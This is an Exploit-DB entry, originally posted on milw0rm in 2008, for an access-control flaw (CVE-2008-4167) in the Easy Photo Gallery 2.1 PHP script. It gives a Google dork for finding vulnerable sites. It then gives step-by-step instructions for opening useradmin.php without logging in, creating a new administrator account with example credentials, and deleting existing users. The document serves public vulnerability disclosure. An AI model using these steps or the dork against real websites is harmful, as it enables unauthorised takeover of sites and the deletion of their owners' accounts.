Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user

Author: Stack
type: webapps
platform: php
port: 
date_added: 2008-09-10 
date_updated: 2016-12-23 
verified: 1 
codes: OSVDB-48317;CVE-2008-4167 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comezphotogallery-2.1.zip

#----------------------------------------------------------------
#
#Script : Ezphotogallery 2.1
#
#Type : Vulnerabilities ( Add Admin user/Remove user)
#
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#
#----------------------------------------------------------------
#
#Discovered by : Stack
#
#----------------------------------------------------------------
#
#Script Download :  http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#----------------------------------------------------------------

Exploit :
 http://site.il/useradmin.php
how to use exploit
in Add user select
----------------------------------------
Simple example by Stack user :d :d
----------------------------------------
        Add user
Name:  Stack
Password: passstack
E-mail: Stack@hotmail.fr
Private: yes or no
Administrator:  yes
now stack username is a administrator user
----------------------------------------
       Remove user
User:  chouse the user and click remove
----------------------------------------

# milw0rm.com [2008-09-11]